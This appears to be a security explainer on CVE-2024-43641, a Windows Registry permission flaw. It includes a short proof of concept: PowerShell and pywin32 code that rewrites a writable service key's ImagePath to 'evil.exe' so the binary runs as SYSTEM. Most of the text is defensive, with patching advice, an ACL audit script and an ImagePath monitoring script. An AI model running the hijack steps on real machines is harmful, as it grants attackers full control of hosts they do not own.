CVE-2024-43641 - Windows Registry Elevation of Privilege Vulnerability Explained
In November 2024, as part of that month's Patch Tuesday release, Microsoft patched an elevation of privilege (EoP) vulnerability in Windows tracked as CVE-2024-43641. The flaw lies in how the Windows Registry enforces access control, and it could let a local attacker gain SYSTEM-level privileges, one of the most damaging outcomes on a Windows host. Here we break down what is known about CVE-2024-43641: the technical picture, how this class of bug is exploited, and how you can stay secure.
What Is CVE-2024-43641?
CVE-2024-43641 affects how Windows enforces permissions on certain registry keys. A regular user, or malware running as that user, could exploit it to obtain administrator or SYSTEM privileges.
Why does that matter? SYSTEM (LocalSystem) is the most powerful account on a Windows machine. Code running as SYSTEM can disable security tools, hide its own artifacts, and do almost anything else on the host.
Original Reference:
- Microsoft Security Response Center: CVE-2024-43641
- NIST NVD Entry: CVE-2024-43641
Technical Details
Registry Keys and Permissions:
Windows Registry keys hold critical system settings. The most sensitive keys, such as those under HKEY_LOCAL_MACHINE\SYSTEM, are normally writable only by administrators and trusted services; standard users get read access at most.
A vulnerability of the CVE-2024-43641 kind means Windows grants write access on such a sensitive key to a low-privileged group (typically "Users" or "Authenticated Users"). The public advisory does not give root-cause details, so the walkthrough below uses a representative scenario: a service configuration key under HKLM\SYSTEM\CurrentControlSet\Services that standard users can write to. Service keys are the classic target because the Service Control Manager reads ImagePath from them and launches that binary with the service's account, usually LocalSystem.
Proof of Concept (PoC) Walkthrough
Let's look at a simplified version of how a bug of this class is exploited, using a placeholder service name (SomeService).
Step 1: Check the Key's ACL
On a vulnerable system, PowerShell shows who can write to the key:
$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\SomeService'
(Get-Acl $regPath).Access | Format-Table IdentityReference, RegistryRights, AccessControlType
If "BUILTIN\Users" or "NT AUTHORITY\Authenticated Users" appears with FullControl, the key is exploitable. FullControl is not required, though: SetValue alone is enough to rewrite ImagePath, and CreateSubKey or WriteKey are just as bad, so treat any write-class right held by a low-privileged principal as a finding.
Step 2: Redirect the Service Binary
An attacker changes the ImagePath value to point at an executable they control:
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\SomeService' -Name 'ImagePath' -Value 'C:\Temp\evil.exe'
Step 3: Restart the Service
A standard user normally cannot stop or start a service directly, so the attacker triggers or waits for a reboot (or picks a service whose start is permitted). When the Service Control Manager next starts SomeService, it launches evil.exe with the service's configured account, SYSTEM in this scenario, and the attacker has full control of the machine.
The same write in Python (requires pywin32); the reserved arguments that the original listing dropped are restored here:
import win32api
import win32con

# Service key under HKLM that the vulnerable ACL lets a standard user write to.
key_path = r"SYSTEM\CurrentControlSet\Services\SomeService"

# Open the key with only the right we need. The third argument is reserved and must be 0.
reg = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, key_path, 0, win32con.KEY_SET_VALUE)
try:
    # Replace the service binary. The third argument is reserved (0). ImagePath is
    # normally REG_EXPAND_SZ; use that type if the path contains environment variables.
    win32api.RegSetValueEx(reg, "ImagePath", 0, win32con.REG_SZ, r"C:\Temp\evil.exe")
finally:
    win32api.RegCloseKey(reg)
The next time SomeService starts, evil.exe runs as SYSTEM.
Immediate Defense
Update Windows
The best fix: install the latest Windows updates.
Use built-in tools to check registry permissions. The ACL of the parent Services key tells you little; check each service's own key:
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
    ForEach-Object { Get-Acl -Path $_.PSPath } |
    Format-Table Path, AccessToString -AutoSize
Look for entries where Users, Authenticated Users or Everyone hold FullControl, or any write-class right (SetValue, CreateSubKey, WriteKey), on a service key, then use Set-Acl to remove these permissions.
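The PowerShell script below is an added example, not code from the original article or from Microsoft. It generalises the ACL check from the PoC and the audit above: it walks every key under HKLM\SYSTEM\CurrentControlSet\Services and reports Allow ACEs that give a low-privileged principal any write-class right, not only FullControl. The set of principals treated as low-privileged and the set of rights treated as write-class are the author's assumptions; setting $Fix to $true removes the offending explicit ACEs with Set-Acl, so run it elevated.

```powershell
# Added example (not from the original article): audit every service key for
# Allow ACEs that grant a low-privileged principal any write-class right.
# Assumptions: the principals in $lowPriv and the rights in $writeRights are
# the author's choice of what "low-privileged" and "write-class" mean here.
# Run in an elevated PowerShell session.
$Fix = $false   # set to $true to remove offending explicit ACEs with Set-Acl

$servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$lowPriv = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE', 'Everyone')

# Any one of these rights is enough to hijack a service: SetValue rewrites
# ImagePath, CreateSubKey/WriteKey add Parameters or ServiceDll entries, and
# ChangePermissions/TakeOwnership let the attacker grant themselves the rest.
$R = [System.Security.AccessControl.RegistryRights]
$writeRights = $R::SetValue -bor $R::CreateSubKey -bor $R::WriteKey -bor
               $R::ChangePermissions -bor $R::TakeOwnership -bor $R::FullControl

$findings = foreach ($key in Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue) {
    $acl = Get-Acl -Path $key.PSPath
    # Allow ACEs for a low-privileged principal with at least one write-class bit set.
    $bad = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        ($_.RegistryRights -band $writeRights) -ne 0
    })
    foreach ($ace in $bad) {
        [pscustomobject]@{
            Service   = $key.PSChildName
            Identity  = $ace.IdentityReference.Value
            Rights    = $ace.RegistryRights
            Inherited = $ace.IsInherited
        }
    }
    if ($Fix) {
        # Inherited ACEs cannot be removed on the child; they come from the parent key.
        $explicit = @($bad | Where-Object { -not $_.IsInherited })
        if ($explicit.Count -gt 0) {
            foreach ($ace in $explicit) { $null = $acl.RemoveAccessRule($ace) }
            Set-Acl -Path $key.PSPath -AclObject $acl
            Write-Warning "Removed $($explicit.Count) ACE(s) from $($key.PSChildName)"
        }
    }
}

$findings | Format-Table -AutoSize
```

Inherited ACEs are reported but not removed, because they are defined on a parent key; fix those at the parent, or break inheritance on the child with SetAccessRuleProtection before removing them. Review each finding before setting $Fix, since a vendor may have granted the right deliberately, and test on one machine first.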
- Watch for unexpected changes to ImagePath values in the registry.
- Use Sysinternals Autoruns to detect strange service startup paths.
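As an added example that is not part of the original article, the script below implements the ImagePath watch in PowerShell: it snapshots every service's ImagePath to a JSON baseline, reports services that are new or whose ImagePath changed since the last run, and flags binaries that live outside the Windows and Program Files directories or that low-privileged users can write to (a user-writable service binary gives the same SYSTEM outcome without touching the registry). The baseline path, the list of trusted directories and the list of low-privileged principals are assumptions; adjust them for your environment and keep the baseline somewhere standard users cannot modify.

```powershell
# Added example (not from the original article): baseline and diff service
# ImagePath values, and flag binaries in unusual or user-writable locations.
# Assumptions: $baseline, $trustedRoots and $lowPriv are site-specific choices.
$baseline     = 'C:\ProgramData\svc-imagepath-baseline.json'
$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
    Where-Object { $_.Length -gt 1 }   # drop the entry if ProgramFiles(x86) is unset
$lowPriv      = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$writeMask    = [System.Security.AccessControl.FileSystemRights]::Write -bor
                [System.Security.AccessControl.FileSystemRights]::FullControl

# Turn an ImagePath value into an absolute executable path. Handles the forms
# the SCM accepts: quoted paths with arguments, %SystemRoot%-style variables,
# the \SystemRoot\ and \??\ prefixes used by drivers, and system32-relative paths.
function Get-ServiceBinary([string]$imagePath) {
    $p = [Environment]::ExpandEnvironmentVariables($imagePath.Trim())
    if ($p -match '^"([^"]+)"') { $p = $Matches[1] }   # "C:\dir with spaces\x.exe" -args
    elseif ($p -match '^(\S+)') { $p = $Matches[1] }   # C:\dir\x.exe -args
    if ($p.StartsWith('\??\'))        { $p = $p.Substring(4) }
    if ($p.StartsWith('\SystemRoot\', 'OrdinalIgnoreCase')) { $p = Join-Path $env:SystemRoot $p.Substring(12) }
    if (-not [System.IO.Path]::IsPathRooted($p)) { $p = Join-Path $env:SystemRoot $p }
    return $p
}

# Collect the current ImagePath of every service key.
$current = @{}
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
    $ip = (Get-ItemProperty -Path $_.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
    if ($ip) { $current[$_.PSChildName] = [string]$ip }
}

# Diff against the previous snapshot, if there is one.
if (Test-Path -LiteralPath $baseline) {
    $previous = Get-Content -LiteralPath $baseline -Raw | ConvertFrom-Json
    foreach ($svc in $current.Keys) {
        $old = $previous.$svc
        if ($null -eq $old)              { "NEW      $svc -> $($current[$svc])" }
        elseif ($old -ne $current[$svc]) { "CHANGED  $svc : '$old' -> '$($current[$svc])'" }
    }
}

# Flag binaries outside the trusted roots or writable by low-privileged users.
foreach ($svc in $current.Keys) {
    $bin = Get-ServiceBinary $current[$svc]
    $trusted = $false
    foreach ($root in $trustedRoots) { if ($bin.StartsWith($root, 'OrdinalIgnoreCase')) { $trusted = $true } }
    if (-not $trusted) { "SUSPECT  $svc runs from outside the usual system directories: $bin" }
    if (Test-Path -LiteralPath $bin) {
        $weak = (Get-Acl -LiteralPath $bin).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $_.IdentityReference.Value -and
            ($_.FileSystemRights -band $writeMask) -ne 0
        }
        if ($weak) { "WRITABLE $svc binary is writable by low-privileged users: $bin" }
    }
}

# Save the new snapshot for the next run.
$current | ConvertTo-Json | Set-Content -LiteralPath $baseline
```

Run it once to create the baseline and then on a schedule; the first run reports only location and permission findings, later runs also print NEW and CHANGED lines. Services hosted by svchost.exe load their code from the ServiceDll value under the Parameters subkey, which this script does not inspect, so keep Autoruns in the loop for those.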
Conclusion
CVE-2024-43641 is a reminder that a simple permission mistake can cause a huge security problem. Registry ACLs are a load-bearing part of Windows security, and a single misconfigured ACE on the wrong key is all an attacker needs to reach SYSTEM.
Stay safe:
Regularly audit privileged access.
References:
- Microsoft Patch Tuesday – November 2024
- CERT/CC Vulnerability Note VU#209295
Timeline
Published on: 11/12/2024 18:15:33 UTC
Last modified on: 11/21/2024 13:43:07 UTC